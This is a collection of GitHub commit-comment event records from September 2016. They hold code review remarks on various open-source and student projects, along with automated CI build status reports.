{"id":"4520354477","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18908531,"position":7,"line":267,"path":"src/builtin_printf.cpp","commit_id":"6b1801063b7078c8d9357f0ac8447202f3335f1b","created_at":"2016-09-06T09:59:58Z","updated_at":"2016-09-06T09:59:58Z","body":"I don't get why we are using a double here and `wcstod` for the `long double` template."}},"created_at":"2016-09-06T09:59:58Z"}
{"id":"4524640947","type":"CommitCommentEvent","actor":{"login":"moiseev"},"repo":{"name":"apple/swift-llvm"},"payload":{"comment":{"id":18921059,"position":5,"line":69,"path":"utils/lit/lit/run.py","commit_id":"46c90ef22b18a32ad914cf1a4b71dc54595d44e5","created_at":"2016-09-07T00:00:51Z","updated_at":"2016-09-07T00:00:51Z","body":"The problem with that would be that the consumers (of which there are 2) would have to have a common functionality of checking the `maxFailures`, and in order to get that functionality right, I would have to introduce a superclass etc, which I think is a little more than a tiny patch. But yeah, that's doable.\r\n\r\nThanks for the hint!\r\nAnd a special thanks for the `maxFailures` instead of `failFast`, I haven't thought about it."}},"created_at":"2016-09-07T00:00:51Z"}
{"id":"4524646271","type":"CommitCommentEvent","actor":{"login":"shazron"},"repo":{"name":"apache/cordova-plugin-wkwebview-engine"},"payload":{"comment":{"id":18921069,"position":80,"line":80,"path":"src/ios/CDVWKWebViewEngine.m","commit_id":"40f6b4538cb063a7de9a454190d652247c5dadee","created_at":"2016-09-07T00:02:23Z","updated_at":"2016-09-07T00:02:23Z","body":"Thanks! Filed https://issues.apache.org/jira/browse/CB-11815"}},"created_at":"2016-09-07T00:02:23Z"}
{"id":"4524654051","type":"CommitCommentEvent","actor":{"login":"bmwalters"},"repo":{"name":"0tt/maestro"},"payload":{"comment":{"id":18921086,"position":5,"line":9,"path":"lua/maestro/sv_bans.lua","commit_id":"aadf349796222b57cfa9e94c733ec19834257f2b","created_at":"2016-09-07T00:04:43Z","updated_at":"2016-09-07T00:04:43Z","body":"uhh.. when would there never be a `player.GetBySteamID`? If there isn't then something has modified the global lib and this *should* break"}},"created_at":"2016-09-07T00:04:43Z"}
{"id":"4524655091","type":"CommitCommentEvent","actor":{"login":"winterland1989"},"repo":{"name":"ezyang/cabal"},"payload":{"comment":{"id":18921087,"position":null,"line":null,"path":null,"commit_id":"6422d67145af17cf3153cda5461a103959ae696f","created_at":"2016-09-07T00:05:02Z","updated_at":"2016-09-07T00:05:02Z","body":"Thanks for mentioning this, it's pretty good now!"}},"created_at":"2016-09-07T00:05:02Z"}
{"id":"4524655129","type":"CommitCommentEvent","actor":{"login":"spencergibb"},"repo":{"name":"spring-cloud/spring-cloud-netflix"},"payload":{"comment":{"id":18921088,"position":33,"line":111,"path":"spring-cloud-netflix-core/src/main/java/org/springframework/cloud/netflix/eureka/EurekaClientAutoConfiguration.java","commit_id":"112987206133a5c82da0356c4920894a0bc36f46","created_at":"2016-09-07T00:05:02Z","updated_at":"2016-09-07T00:05:02Z","body":"Please don't comment on a commit. If you feel there is a bug, open an issue with steps to reproduce or a sample project."}},"created_at":"2016-09-07T00:05:02Z"}
{"id":"4524659894","type":"CommitCommentEvent","actor":{"login":"k24dizzle"},"repo":{"name":"michaelcao311/liblod"},"payload":{"comment":{"id":18921100,"position":36,"line":79,"path":"server/server.js","commit_id":"dbc8d3cbd3470d522afd812e52845adeb19dbbab","created_at":"2016-09-07T00:06:32Z","updated_at":"2016-09-07T00:06:32Z","body":"blug"}},"created_at":"2016-09-07T00:06:32Z"}
{"id":"4524660457","type":"CommitCommentEvent","actor":{"login":"k24dizzle"},"repo":{"name":"michaelcao311/liblod"},"payload":{"comment":{"id":18921103,"position":4,"line":23,"path":"server/server.js","commit_id":"dbc8d3cbd3470d522afd812e52845adeb19dbbab","created_at":"2016-09-07T00:06:43Z","updated_at":"2016-09-07T00:06:43Z","body":"gets the keys of the dictionary"}},"created_at":"2016-09-07T00:06:43Z"}
{"id":"4524662092","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":18921110,"position":null,"line":null,"path":null,"commit_id":"979a9a54e5e94e0f034b6de1f027c57e9b2aa46d","created_at":"2016-09-07T00:07:12Z","updated_at":"2016-09-07T00:07:12Z","body":"For classic only, no up-port"}},"created_at":"2016-09-07T00:07:12Z"}
{"id":"4524671492","type":"CommitCommentEvent","actor":{"login":"leggetter"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18921133,"position":7,"line":47,"path":"package.json","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-07T00:10:13Z","updated_at":"2016-09-07T00:10:13Z","body":"Good question. It's nice that the library has zero dependencies at the moment.\r\n\r\nWhilst digging into https://github.com/Nexmo/nexmo-cli/issues/81 I did take a look at the code required to create a JWT. Based on that investigation my preference would be to not have to maintain our own JWT generation and verification code.\r\n\r\nI'm open to being convinced otherwise through somebody showing me a few simple lines of code to generate a JWT from a private key and verify a JWT using public key."}},"created_at":"2016-09-07T00:10:13Z"}
{"id":"4524673243","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921137,"position":1,"line":1,"path":"README.rdoc","commit_id":"be204ac37b7917cf2d1c317c4c123aa8c882d8b5","created_at":"2016-09-07T00:10:43Z","updated_at":"2016-09-07T00:10:43Z","body":"you should fill in this readme. if a new person were to clone your app, they'd have no idea how to run it. the README is where someone looks to know 1) what this is 2) why they'd want to use it (more applicable to libraries) 3) how they can run it"}},"created_at":"2016-09-07T00:10:43Z"}
{"id":"4524674894","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":18921144,"position":90,"line":108,"path":"repl/src/main/scala/org/apache/spark/repl/h2o/BaseH2OInterpreter.scala","commit_id":"59ce26e89d9f195f3f0fac742a0ab9ac609d02d0","created_at":"2016-09-07T00:11:14Z","updated_at":"2016-09-07T00:11:14Z","body":"I was looking into code of Spark REPL - the initialization is more complex"}},"created_at":"2016-09-07T00:11:14Z"}
{"id":"4524678769","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921160,"position":null,"line":null,"path":null,"commit_id":"3e633f4c6aef2b158bd9183eb6bc141ada13734c","created_at":"2016-09-07T00:12:21Z","updated_at":"2016-09-07T00:12:21Z","body":"the elements of a good git commit message are:\r\n\r\nhttp://chris.beams.io/posts/git-commit/"}},"created_at":"2016-09-07T00:12:21Z"}
{"id":"4524682196","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921172,"position":5,"line":9,"path":"db/seeds.rb","commit_id":"3e633f4c6aef2b158bd9183eb6bc141ada13734c","created_at":"2016-09-07T00:13:25Z","updated_at":"2016-09-07T00:13:25Z","body":"you might want to read this from an environment variable. it's typically not committed into code either."}},"created_at":"2016-09-07T00:13:25Z"}
{"id":"4524690253","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921181,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-07T00:15:56Z","updated_at":"2016-09-07T00:15:56Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2332 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T00:15:56Z"}
{"id":"4524690597","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18921182,"position":null,"line":null,"path":null,"commit_id":"083dc63c65ce0617deefe753f4e2d298ddff7f3c","created_at":"2016-09-07T00:16:04Z","updated_at":"2016-09-07T00:16:04Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 18](http://teamcity.otenv.com/viewLog.html?buildId=5176004&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-07T00:16:04Z"}
{"id":"4524695745","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18921193,"position":null,"line":null,"path":null,"commit_id":"083dc63c65ce0617deefe753f4e2d298ddff7f3c","created_at":"2016-09-07T00:17:44Z","updated_at":"2016-09-07T00:17:44Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 18](http://teamcity.otenv.com/viewLog.html?buildId=5176004&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:40"}},"created_at":"2016-09-07T00:17:44Z"}
{"id":"4524698614","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18921204,"position":null,"line":null,"path":null,"commit_id":"d2c86491f88ac8b55eac3a1cebe16ad18c55f4aa","created_at":"2016-09-07T00:18:41Z","updated_at":"2016-09-07T00:18:41Z","body":"Sorry I don't want to spoil :p"}},"created_at":"2016-09-07T00:18:41Z"}
{"id":"4524699884","type":"CommitCommentEvent","actor":{"login":"tamarazuk"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18921206,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-07T00:19:05Z","updated_at":"2016-09-07T00:19:05Z","body":"> If this is an issue about US postcodes, we don't officially support 9 digits.\r\n\r\n@mikejolley thanks for your reply. This is relating to the US 9 digit postcode (\"ZIP+4\"). Does this mean that WC doesn't support postcodes in the `12345-1234` format? If so, has this always been the case? I recall working on a ticket using these 9 digit codes with Simplify commerce earlier this year, and the dashes were definitely not removed when the postcode was saved to the order or even used by the gateway. \r\n\r\nIt looks to me that WC2.6 introduced this \"limitation\". If there are no plans to work with US 9 digit postcodes in the same way you do for Brazil postcodes, then we will add something to our gateway framework as customers do use this format occasionally and some gateway APIs won't accept the 9 digit code _without_ the `-`. Also, note that many address validation solutions would automatically use the ZIP+4 code if one is appropriate. \r\n\r\nFWIW, `12345-1234` is a [valid zip format in the US](https://en.wikipedia.org/wiki/ZIP_Code#ZIP.2B4). If 9 digit codes are not supported at all, then shouldn't the remaining 4 digits be stripped out when the order meta is saved?"}},"created_at":"2016-09-07T00:19:05Z"}
{"id":"4524701468","type":"CommitCommentEvent","actor":{"login":"LuoYuWuSheng"},"repo":{"name":"XDCreater/XD2HandBookStore"},"payload":{"comment":{"id":18921212,"position":4,"line":4,"path":"index.html","commit_id":"ba3b8867b9e377a7bdefe927b8f62c0ba65cf7ae","created_at":"2016-09-07T00:19:34Z","updated_at":"2016-09-07T00:19:34Z","body":"i can accept your commit and make some comment on the line i want to discuss with you"}},"created_at":"2016-09-07T00:19:34Z"}
{"id":"4524703668","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921217,"position":7,"line":5,"path":"app/views/songs/show.html.erb","commit_id":"0313a38e737d17692d623ddfc12c422ae5202885","created_at":"2016-09-07T00:20:16Z","updated_at":"2016-09-07T00:20:16Z","body":"might want to create a view helper"}},"created_at":"2016-09-07T00:20:16Z"}
{"id":"4524704627","type":"CommitCommentEvent","actor":{"login":"xfxyjwf"},"repo":{"name":"xfxyjwf/protobuf"},"payload":{"comment":{"id":18921221,"position":null,"line":null,"path":null,"commit_id":"ed3ecd9693b6918630362727caf0bd3f1731cb03","created_at":"2016-09-07T00:20:35Z","updated_at":"2016-09-07T00:20:35Z","body":"Because this is not the right change to make: we just can't provide compatibility guarantee for package private symbols, and I didn't feel anyone was interested in it either."}},"created_at":"2016-09-07T00:20:35Z"}
{"id":"4524705818","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921224,"position":21,"line":19,"path":"app/views/songs/show.html.erb","commit_id":"0313a38e737d17692d623ddfc12c422ae5202885","created_at":"2016-09-07T00:20:57Z","updated_at":"2016-09-07T00:20:57Z","body":"instead of reversing here, may you could change the way the query sorts?"}},"created_at":"2016-09-07T00:20:57Z"}
{"id":"4524706533","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921228,"position":3,"line":3,"path":"app/views/users/show.html.erb","commit_id":"0313a38e737d17692d623ddfc12c422ae5202885","created_at":"2016-09-07T00:21:12Z","updated_at":"2016-09-07T00:21:12Z","body":"could reuse the view helper i mentioned above"}},"created_at":"2016-09-07T00:21:12Z"}
{"id":"4524708605","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921235,"position":5,"line":15,"path":"app/controllers/songs_controller.rb","commit_id":"44bb12a6ea81a65bfc1a772be0ac5f154cbc750d","created_at":"2016-09-07T00:21:51Z","updated_at":"2016-09-07T00:21:51Z","body":"dead code should always be removed before committing 😁 "}},"created_at":"2016-09-07T00:21:51Z"}
{"id":"4524709219","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921237,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-07T00:22:02Z","updated_at":"2016-09-07T00:22:02Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-07T00:22:02Z"}
{"id":"4524709428","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921239,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T00:22:05Z","updated_at":"2016-09-07T00:22:05Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2362 of 2368 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.75%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T00:22:05Z"}
{"id":"4524711928","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921247,"position":46,"line":39,"path":"sdcclient/_client.py","commit_id":"3716f493fba53cc69a9799c45532ab4b248cf956","created_at":"2016-09-07T00:22:55Z","updated_at":"2016-09-07T00:22:55Z","body":"I have a **huge** distaste for this. If you are polling the api for user information changes, you'll run into this aliasing and get cached information.\r\n\r\n(I'm currently writing a Sysdig Node API client: I decided to rather let the user cache the information himself.)"}},"created_at":"2016-09-07T00:22:55Z"}
{"id":"4524713517","type":"CommitCommentEvent","actor":{"login":"MarieTest"},"repo":{"name":"nikkitest/Test"},"payload":{"comment":{"id":18921255,"position":null,"line":null,"path":null,"commit_id":"3d59bd38339d1af052d1560b32f443a5abf0f8c9","created_at":"2016-09-07T00:23:26Z","updated_at":"2016-09-07T00:23:26Z","body":"む、masterブランチですね。。test-branchで作業できていませんでした。\r\n\r\n私のgithubアカウントではtest-branchにいたのですが、SourceTreeではmasterブランチにいました。コマンドラインは一切使いたくないのでSourceTreeでコミット、プッシュをしました。そのことにより私のローカルブランチでの変更がnikkitestのtestのmasterブランチに反映されてしまいました。　　というわけでした。\r\n\r\n次はプルリクエストを試します。\r\n"}},"created_at":"2016-09-07T00:23:26Z"}
{"id":"4524713605","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18921256,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-07T00:23:27Z","updated_at":"2016-09-07T00:23:27Z","body":"@frank-dittrich history tells me that the comment would survive into the derived format verbatim, but not the gist of it 😢 "}},"created_at":"2016-09-07T00:23:27Z"}
{"id":"4524716023","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921261,"position":6,"line":4,"path":"app/controllers/votes_controller.rb","commit_id":"44bb12a6ea81a65bfc1a772be0ac5f154cbc750d","created_at":"2016-09-07T00:24:13Z","updated_at":"2016-09-07T00:24:13Z","body":"it's usually frowned upon to create single letter variables. they're hard to track down, not descriptive, and hard to change. \r\n\r\ngood variable names can help a program document itself. more on that [here](https://blog.codinghorror.com/when-good-comments-go-bad/)"}},"created_at":"2016-09-07T00:24:13Z"}
{"id":"4524716349","type":"CommitCommentEvent","actor":{"login":"sgrif"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18921263,"position":4,"line":17,"path":"activerecord/test/models/book.rb","commit_id":"67c1719012506c3387df067961252b5df50a97ce","created_at":"2016-09-07T00:24:16Z","updated_at":"2016-09-07T00:24:16Z","body":"Nothing other than integers has ever been officially supported\n\nOn Tue, Sep 6, 2016, 4:34 PM Jonathan Rochkind <notifications@github.com>\nwrote:\n\n> @sgrif <https://github.com/sgrif> This seems to be the first time there\n> was a test case around Enum with db values that were Strings rather than\n> integers.\n>\n> But it's associated with a few PR's and Issues that are about default\n> values in Enums, and don't seem to mention db types or if/when/that db\n> strings are supported as well as Integers.\n>\n> Something that's still not documented anywhere, such as the Enum class\n> header inline docs!\n>\n> Curious if you know anything about the origin/history of Enum supporting\n> String db values? I was wishing it did, and went to look at the source --\n> to find that it already did. At least in Rails5. Now I'm very curious.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rails/rails/commit/67c1719012506c3387df067961252b5df50a97ce#commitcomment-18918172>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABdWK-H_OliIxj-4DdV3SE_VwQ1s2Cz3ks5qnc5CgaJpZM4J2QPR>\n> .\n>\n"}},"created_at":"2016-09-07T00:24:16Z"}
{"id":"4524717402","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921269,"position":4,"line":17,"path":"app/assets/stylesheets/application.css","commit_id":"ce1196af61a4c11d5d2b61e2cc7c62913dc33030","created_at":"2016-09-07T00:24:41Z","updated_at":"2016-09-07T00:24:41Z","body":"these aren't being used. may want to clean up"}},"created_at":"2016-09-07T00:24:41Z"}
{"id":"4524719622","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921273,"position":null,"line":null,"path":null,"commit_id":"fa8cd66ce8e72ef923a46cff323e25fc3856c5c4","created_at":"2016-09-07T00:25:22Z","updated_at":"2016-09-07T00:25:22Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa8cd66ce8e72ef923a46cff323e25fc3856c5c4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa8cd66ce8e72ef923a46cff323e25fc3856c5c4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T00:25:22Z"}
{"id":"4524719774","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921274,"position":4,"line":17,"path":"app/controllers/songs_controller.rb","commit_id":"ce1196af61a4c11d5d2b61e2cc7c62913dc33030","created_at":"2016-09-07T00:25:25Z","updated_at":"2016-09-07T00:25:25Z","body":"#show is a really long function. it would benefit from being broken down into separate helper functions. it's also help self-document, like i mentioned before"}},"created_at":"2016-09-07T00:25:25Z"}
{"id":"4524721152","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921276,"position":9,"line":18,"path":"app/controllers/songs_controller.rb","commit_id":"ce1196af61a4c11d5d2b61e2cc7c62913dc33030","created_at":"2016-09-07T00:25:53Z","updated_at":"2016-09-07T00:25:53Z","body":"save this value into a variable so you're not querying it twice. you'll save time and memory"}},"created_at":"2016-09-07T00:25:53Z"}
{"id":"4524722562","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18921280,"position":null,"line":null,"path":null,"commit_id":"6caf46b043f013570fbb86804428b0a4998c9706","created_at":"2016-09-07T00:26:20Z","updated_at":"2016-09-07T00:26:20Z","body":"👍 "}},"created_at":"2016-09-07T00:26:20Z"}
{"id":"4524722973","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18921283,"position":null,"line":null,"path":null,"commit_id":"549a36b092c46d033bc83452e4970ebee906bed9","created_at":"2016-09-07T00:26:30Z","updated_at":"2016-09-07T00:26:30Z","body":"👍 "}},"created_at":"2016-09-07T00:26:30Z"}
{"id":"4524724849","type":"CommitCommentEvent","actor":{"login":"jason-pierce-designs"},"repo":{"name":"Stratera/p2prec"},"payload":{"comment":{"id":18921291,"position":8,"line":20,"path":"peerrate-ui/src/app/components/home/home.js","commit_id":"dae7633454b77fda5a83152ae2c368630bf6a8fd","created_at":"2016-09-07T00:27:08Z","updated_at":"2016-09-07T00:27:08Z","body":"i like the consistency here"}},"created_at":"2016-09-07T00:27:08Z"}
{"id":"4524725977","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921293,"position":4,"line":17,"path":"app/views/categories/index.html.erb","commit_id":"e59094fef560ffdabbd5b9428aeaa5ad383b4ad5","created_at":"2016-09-07T00:27:33Z","updated_at":"2016-09-07T00:27:33Z","body":"👍 "}},"created_at":"2016-09-07T00:27:33Z"}
{"id":"4524729309","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921298,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T00:28:38Z","updated_at":"2016-09-07T00:28:38Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T00:28:38Z"}
{"id":"4524731856","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921307,"position":4,"line":9,"path":"app/controllers/users_controller.rb","commit_id":"2b4d3aeb119a3b0ab403afb2e75a13f7b76d555a","created_at":"2016-09-07T00:29:28Z","updated_at":"2016-09-07T00:29:28Z","body":"this is a good example of making a helper function is better than having a comment. you could create a method:\r\n\r\n```ruby\r\n  def show_user_favorites\r\n     show(Favorites #...\r\n  end\r\n```\r\n\r\nand call it in show\r\n\r\n```ruby\r\ndef show\r\n  #..other stuff\r\n  show_user_favorites\r\nend"}},"created_at":"2016-09-07T00:29:28Z"}
{"id":"4524733139","type":"CommitCommentEvent","actor":{"login":"jason-pierce-designs"},"repo":{"name":"Stratera/p2prec"},"payload":{"comment":{"id":18921312,"position":9,"line":18,"path":"peerrate-ui/src/app/components/profile/edit/edit.tpl.html","commit_id":"dae7633454b77fda5a83152ae2c368630bf6a8fd","created_at":"2016-09-07T00:29:54Z","updated_at":"2016-09-07T00:29:54Z","body":"Per the US Draft Design Standards website, we're not supposed to provide a placeholder for input fields, mainly because on some browsers, the contrast ratio isn't high enough to meet 508 standards. "}},"created_at":"2016-09-07T00:29:54Z"}
{"id":"4524733595","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921313,"position":5,"line":4,"path":"app/views/categories/index.html.erb","commit_id":"2b4d3aeb119a3b0ab403afb2e75a13f7b76d555a","created_at":"2016-09-07T00:30:02Z","updated_at":"2016-09-07T00:30:02Z","body":"you mostly don't want code related comments in user facing code, like HTML"}},"created_at":"2016-09-07T00:30:02Z"}
{"id":"4524736084","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921319,"position":null,"line":null,"path":null,"commit_id":"fa8cd66ce8e72ef923a46cff323e25fc3856c5c4","created_at":"2016-09-07T00:30:48Z","updated_at":"2016-09-07T00:30:48Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa8cd66ce8e72ef923a46cff323e25fc3856c5c4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T00:30:48Z"}
{"id":"4524737333","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921321,"position":6,"line":23,"path":"app/views/songs/index.html.erb","commit_id":"39d67f8189a38ab57b5cc8359c5533c1a23800ec","created_at":"2016-09-07T00:31:14Z","updated_at":"2016-09-07T00:31:14Z","body":"though this works, using presentational elements (like `<br>` for line breaks) is generally less preferred than styling it in css. so you could give the element that needs space after it a margin."}},"created_at":"2016-09-07T00:31:14Z"}
{"id":"4524739924","type":"CommitCommentEvent","actor":{"login":"ianmcnally"},"repo":{"name":"jerrybi0522/otamusic"},"payload":{"comment":{"id":18921325,"position":13,"line":161,"path":"app/assets/stylesheets/application.css","commit_id":"f83ed28fa248e7230ed4b31214ccd0d493f555be","created_at":"2016-09-07T00:32:05Z","updated_at":"2016-09-07T00:32:05Z","body":"dashes are generally preferred to underscore in css classes\r\n"}},"created_at":"2016-09-07T00:32:05Z"}
